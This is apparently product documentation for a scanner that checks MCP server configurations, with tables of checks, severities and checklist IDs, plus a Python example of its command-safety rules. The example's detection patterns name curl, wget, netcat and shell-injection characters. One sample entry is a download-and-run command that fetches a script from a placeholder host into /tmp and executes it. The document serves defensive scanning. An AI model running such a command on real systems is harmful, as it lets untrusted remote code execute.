# Security Checks

> Complete reference for all 20 security checks run by Golf Scanner

Golf Scanner runs 20 security checks against each MCP server.

| Check ID                          | Name                | Description                                                                                                                                                                 |
| --------------------------------- | ------------------- | --------------------------------------------------------------------------------------------------------------------------------------------------------------------------- |
| `type.detection`                  | Server Type         | Classifies the server as package manager, container, binary, script, or HTTP based on command and transport. All other checks depend on its output.                         |
| `universal.command_sanitization`  | Command Safety      | Detects dangerous patterns in command and args: privilege escalation, shell injection, network downloads, dynamic code execution, and temp path usage.                      |
| `universal.credential_detection`  | Credentials         | Finds plaintext credentials in args, URLs, and environment variables — AWS keys, GitHub/Stripe/Anthropic/OpenAI tokens, JWTs, URL credentials, and sensitive env var names. |
| `universal.registry.verification` | Registry Listing    | Checks whether the server is listed in the official MCP Registry.                                                                                                           |
| `universal.github.trust`          | GitHub Trust        | Evaluates trust signals — archived status, last activity, license, stars, contributor count. Cross-validates repo URLs across sources.                                      |
| `script.location`                 | Script Location     | Flags scripts running from unsafe locations like `/tmp` or home directories.                                                                                                |
| `script.permissions`              | Script Permissions  | Detects world-writable scripts.                                                                                                                                             |
| `binary.location`                 | Binary Location     | Evaluates binary path safety — system paths, `/opt`, home dirs, temp dirs, and unknown locations.                                                                           |
| `binary.permissions`              | Binary Permissions  | Detects world-writable or group-writable binaries.                                                                                                                          |
| `container.isolation`             | Container Isolation | Flags `--privileged` mode, dangerous capabilities (`SYS_ADMIN`), host namespace sharing, missing `--cap-drop`, and writable filesystems.                                    |
| `container.volumes`               | Container Volumes   | Flags dangerous volume mounts — root filesystem, `/etc`, Docker socket, SSH keys, cloud credentials, and kube config.                                                       |
| `container.image`                 | Container Image     | Checks whether images use digest pinning (`@sha256:`) vs mutable tags. Looks for Sigstore attestations.                                                                     |
| `container.registry.existence`    | Container Registry  | Verifies the container image exists in its OCI registry. Flags digest mismatches as possible tampering.                                                                     |
| `container.registry.signature`    | Container Signature | Checks whether the image has a cosign signature with keyless/Fulcio certificates.                                                                                           |
| `package.vulnerability`           | Vulnerabilities     | Queries OSV.dev for known CVEs and malware in npm/PyPI packages. Severity mapped from CVSS score.                                                                           |
| `package.typosquatting`           | Typosquatting       | Detects similarly-named packages that could indicate a typosquatting attack.                                                                                                |
| `package.distribution`            | Distribution        | Evaluates package adoption — download counts and package age.                                                                                                               |
| `package.repository`              | Source Repository   | Checks whether the package links to a source repository. Cross-checks npm, PyPI, deps.dev, and MCP Registry.                                                                |
| `package.unscoped_variant`        | Unscoped Variant    | For scoped npm packages (`@scope/pkg`): checks if the unscoped variant has known malware or vulnerabilities.                                                                |
| `http.oauth`                      | OAuth               | For public HTTP/SSE servers: discovers OAuth/OIDC configuration. Flags missing authentication and HTTP-only endpoints.                                                      |

## Check Applicability by Server Type

Not all checks apply to all server types. The scanner automatically skips checks that don't apply and marks them as `skip` in findings.

| Server Type                             | Applicable Checks                                                                                                                                                          |
| --------------------------------------- | -------------------------------------------------------------------------------------------------------------------------------------------------------------------------- |
| **Package Manager** (npx, bunx, uvx...) | Server Type, Command Safety, Credentials, Registry Listing, Vulnerabilities, Typosquatting, Distribution, Source Repository, Unscoped Variant, GitHub Trust                |
| **Container** (docker, podman...)       | Server Type, Command Safety, Credentials, Container Isolation, Container Volumes, Container Image, Container Registry, Container Signature, Registry Listing, GitHub Trust |
| **Binary**                              | Server Type, Command Safety, Credentials, Binary Location, Binary Permissions, Registry Listing, GitHub Trust                                                              |
| **Script** (python, node...)            | Server Type, Command Safety, Credentials, Script Location, Script Permissions, Registry Listing, GitHub Trust                                                              |
| **Public HTTP/SSE**                     | Server Type, Credentials, Registry Listing, GitHub Trust, OAuth                                                                                                            |
| **Local HTTP/SSE**                      | Server Type, Credentials                                                                                                                                                   |

## Checklist IDs

Each finding includes a `checklist_id` in its `metadata` field. These IDs identify the exact sub-check that triggered the finding.

### ST — Server Type

| ID       | Severity    | Description                                             |
| -------- | ----------- | ------------------------------------------------------- |
| `ST-1.1` | skip        | Package manager server detected                         |
| `ST-1.2` | note        | Container runtime (Docker, Podman)                      |
| `ST-1.3` | note        | Local binary                                            |
| `ST-1.4` | medium      | Script-based server                                     |
| `ST-1.5` | medium      | Unknown command — not recognized                        |
| `ST-2.1` | medium      | Local/private network server                            |
| `ST-2.3` | note / high | Public server — note if HTTPS, high if unencrypted HTTP |
| `ST-2.5` | high        | Unreachable server — URL missing or invalid             |

### UC-1 — Command Safety

| ID       | Severity | Description                                                                     |
| -------- | -------- | ------------------------------------------------------------------------------- |
| `UC-1.1` | critical | Sudo / administrator privileges requested                                       |
| `UC-1.2` | critical | Shell injection metacharacters (`;`, `&&`, `\|\|`, `$(`, backtick, `${`)        |
| `UC-1.3` | high     | Network download commands (`curl`, `wget`, `netcat`, `fetch`, `aria2c`, `axel`) |
| `UC-1.4` | high     | Shell execution (`bash/sh/zsh -c`)                                              |
| `UC-1.5` | high     | Dynamic execution (`--exec`, `-e`, `eval`, `exec()`)                            |
| `UC-1.6` | high     | Temporary paths (`/tmp/`, `/var/tmp/`, `/dev/shm/`)                             |
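
The UC-1 rows can be read as detection rules over a server's `command` and `args`. The following is an added example, not Golf Scanner's own code: the regular expressions, the function names, the sample server entries and the finding layout (beyond `metadata.checklist_id`) are assumptions made for illustration.

```python
import re

# One rule per UC-1 row. IDs, severities and listed patterns come from the
# table above; the regexes are this example's approximation of each row.
RULES = [
    ("UC-1.1", "critical", re.compile(r"(?<![\w.-])sudo(?![\w-])")),
    ("UC-1.2", "critical", re.compile(r";|&&|\|\||\$\(|`|\$\{")),
    ("UC-1.3", "high",
     re.compile(r"(?<![\w.-])(curl|wget|netcat|fetch|aria2c|axel)(?![\w-])")),
    ("UC-1.4", "high", re.compile(r"(?<![\w.-])(bash|sh|zsh)\s+-c(?!\S)")),
    ("UC-1.5", "high", re.compile(r"(?<!\S)(--exec|-e|eval)(?!\S)|exec\(")),
    ("UC-1.6", "high", re.compile(r"/tmp/|/var/tmp/|/dev/shm/")),
]
SEVERITY_ORDER = ["note", "medium", "high", "critical"]


def command_safety(command, args):
    """Return one finding per UC-1 rule that matches the joined command line."""
    line = " ".join([command, *args])
    return [
        {"severity": sev, "metadata": {"checklist_id": cid, "match": m.group(0)}}
        for cid, sev, rx in RULES
        if (m := rx.search(line))
    ]


def checklist_ids(findings):
    return [f["metadata"]["checklist_id"] for f in findings]


def worst_severity(findings):
    """Highest severity among findings, or None when nothing matched."""
    return max((f["severity"] for f in findings),
               key=SEVERITY_ORDER.index, default=None)


# Constructed server entries (hypothetical package name, paths and URL).
SAMPLES = {
    "clean": ("npx", ["-y", "@example/mcp-server", "/srv/data"]),
    "elevated": ("sudo", ["node", "/opt/mcp/server.js"]),
    "inline-code": ("node", ["-e", "require('./server')"]),
    "download-and-run": ("bash", ["-c",
        "curl -s https://example.invalid/setup.sh -o /tmp/setup.sh"
        " && sh /tmp/setup.sh"]),
}

if __name__ == "__main__":
    for name, (command, args) in SAMPLES.items():
        found = command_safety(command, args)
        print(f"{name:18} {worst_severity(found)!s:9} {checklist_ids(found)}")
```

A single entry can trigger several sub-checks at once, which is why each finding carries its own `checklist_id` rather than one ID per check.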

### UC-2 — MCP Registry Verification

| ID       | Severity | Description                              |
| -------- | -------- | ---------------------------------------- |
| `UC-2.1` | note     | Listed in Official MCP Registry (active) |
| `UC-2.2` | high     | Removed from Official MCP Registry       |
| `UC-2.3` | medium   | Not listed in Official MCP Registry      |

### UC-3 — GitHub Trust

| ID       | Severity             | Description                                                                                                |
| -------- | -------------------- | ---------------------------------------------------------------------------------------------------------- |
| `UC-3.1` | note / medium / high | Repository trust evaluation — note if well-established, medium for limited trust signals, high if archived |
| `UC-3.2` | high                 | Repository URL mismatch across sources (possible supply chain attack)                                      |

### CD-1 — Credential Detection

| ID       | Severity | Description                                                                                          |
| -------- | -------- | ---------------------------------------------------------------------------------------------------- |
| `CD-1.1` | critical | Hardcoded credentials — AWS keys, GitHub/Stripe/Slack/Anthropic/OpenAI tokens, Google API keys       |
| `CD-1.2` | high     | High-sensitivity tokens — GitLab PATs, JWTs                                                          |
| `CD-1.3` | medium   | Generic API key with common prefix (`sk-`, `api_`, `key_`, `token_`) or env var credential reference |
| `CD-1.5` | critical | Credentials embedded in URL (`://user:pass@host`)                                                    |

### SC-1 — Script Location

| ID       | Severity    | Description                                                   |
| -------- | ----------- | ------------------------------------------------------------- |
| `SC-1.1` | critical    | Script in temporary location (`/tmp`, `/var/tmp`, `/dev/shm`) |
| `SC-1.2` | medium      | Script in user home directory                                 |
| `SC-1.3` | note / high | Location OK (note), or could not determine path (high)        |

### SC-2 — Script Permissions

| ID       | Severity               | Description                                                                      |
| -------- | ---------------------- | -------------------------------------------------------------------------------- |
| `SC-2.1` | critical / high / note | World-writable (critical), permissions unavailable (high), permissions OK (note) |

### BN-1 — Binary Location

| ID       | Severity | Description                                                        |
| -------- | -------- | ------------------------------------------------------------------ |
| `BN-1.1` | note     | Binary in protected system location (`/usr/bin`, `/usr/local/bin`) |
| `BN-1.2` | medium   | Binary in `/opt` directory                                         |
| `BN-1.3` | medium   | Binary in user home directory                                      |
| `BN-1.4` | critical | Binary in temporary location (`/tmp`, `/var/tmp`, `/dev/shm`)      |
| `BN-1.5` | high     | Non-absolute path or unknown location                              |

### BN-2 — Binary Permissions

| ID       | Severity        | Description                                      |
| -------- | --------------- | ------------------------------------------------ |
| `BN-2.1` | critical / note | World-writable (critical), permissions OK (note) |
| `BN-2.2` | high            | Group-writable binary                            |

### CT-1 — Container Isolation

| ID       | Severity        | Description                                                                  |
| -------- | --------------- | ---------------------------------------------------------------------------- |
| `CT-1.1` | critical / note | Runs with `--privileged` (critical), isolation OK (note)                     |
| `CT-1.2` | critical        | Dangerous capabilities added (`SYS_ADMIN`, `ALL`, `SYS_PTRACE`, `NET_ADMIN`) |
| `CT-1.3` | critical        | Shares host namespaces (`--pid=host`, `--network=host`)                      |
| `CT-1.4` | medium          | No `--cap-drop` to restrict capabilities                                     |
| `CT-1.5` | medium          | Writable filesystem (no `--read-only`)                                       |

### CT-2 — Container Volumes

| ID       | Severity    | Description                                                    |
| -------- | ----------- | -------------------------------------------------------------- |
| `CT-2.1` | high / note | Root filesystem mounted (high), volume configuration OK (note) |
| `CT-2.2` | high        | Mounts `/etc` (system configuration)                           |
| `CT-2.3` | high        | Mounts Docker socket — container escape risk                   |
| `CT-2.4` | high        | Mounts sensitive credentials (`~/.ssh`, `~/.aws`, `~/.kube`)   |

### CT-3 — Container Image Pinning

| ID       | Severity | Description                                |
| -------- | -------- | ------------------------------------------ |
| `CT-3.1` | note     | Image uses SHA256 digest pinning           |
| `CT-3.2` | medium   | Image uses mutable tag (not digest-pinned) |
| `CT-3.3` | medium   | Image uses implicit `:latest` tag          |

### CT-4 — Sigstore Attestation

| ID       | Severity | Description                   |
| -------- | -------- | ----------------------------- |
| `CT-4.1` | note     | Sigstore attestation verified |
| `CT-4.2` | note     | No Sigstore attestation found |

### CT-5 — Container Registry

| ID       | Severity | Description                                |
| -------- | -------- | ------------------------------------------ |
| `CT-5.1` | note     | Image verified in registry                 |
| `CT-5.2` | critical | Image digest mismatch — possible tampering |
| `CT-5.3` | high     | Image not found in registry                |

### CT-6 — Container Signature

| ID       | Severity | Description                                 |
| -------- | -------- | ------------------------------------------- |
| `CT-6.1` | note     | Cosign signature detected                   |
| `CT-6.2` | note     | Keyless (Fulcio) signature with certificate |
| `CT-6.3` | medium   | No cosign signature found                   |

### PH-3 — OAuth / HTTP Auth

| ID       | Severity | Description                                                        |
| -------- | -------- | ------------------------------------------------------------------ |
| `PH-3.1` | critical | Public server returns data without authentication                  |
| `PH-3.2` | note     | Non-OAuth authentication detected (401/403 without OAuth metadata) |
| `PH-3.3` | note     | Server implements OAuth/OpenID Connect                             |
| `PH-3.4` | high     | No OAuth discovery endpoints and auth status undetermined          |

### PM-1 — Package Vulnerabilities

| ID       | Severity | Description                           |
| -------- | -------- | ------------------------------------- |
| `PM-1.1` | critical | Critical vulnerability (CVSS ≥ 9.0)   |
| `PM-1.2` | high     | High vulnerability (CVSS 7.0–8.9)     |
| `PM-1.3` | medium   | Moderate vulnerability (CVSS 4.0–6.9) |
| `PM-1.4` | note     | Low vulnerability (CVSS \< 4.0)       |

### PM-2 — Package Malware

| ID       | Severity | Description            |
| -------- | -------- | ---------------------- |
| `PM-2.1` | critical | Known malware detected |

### PM-3 — Source Repository

| ID       | Severity | Description                            |
| -------- | -------- | -------------------------------------- |
| `PM-3.1` | critical | No source repository linked to package |
| `PM-3.3` | note     | Source repository verified             |

### PM-5 — Typosquatting

| ID       | Severity    | Description                                                 |
| -------- | ----------- | ----------------------------------------------------------- |
| `PM-5.1` | high / note | Similar package names detected (high), none detected (note) |

### PM-6 — Package Distribution

| ID       | Severity             | Description                                                                            |
| -------- | -------------------- | -------------------------------------------------------------------------------------- |
| `PM-6.1` | high / medium / note | Very low downloads (high), low downloads or young package (medium), adoption OK (note) |

### PM-8 — Unscoped Variant

| ID       | Severity      | Description                                                                      |
| -------- | ------------- | -------------------------------------------------------------------------------- |
| `PM-8.1` | high / medium | Malware in unscoped variant (high), vulnerabilities in unscoped variant (medium) |
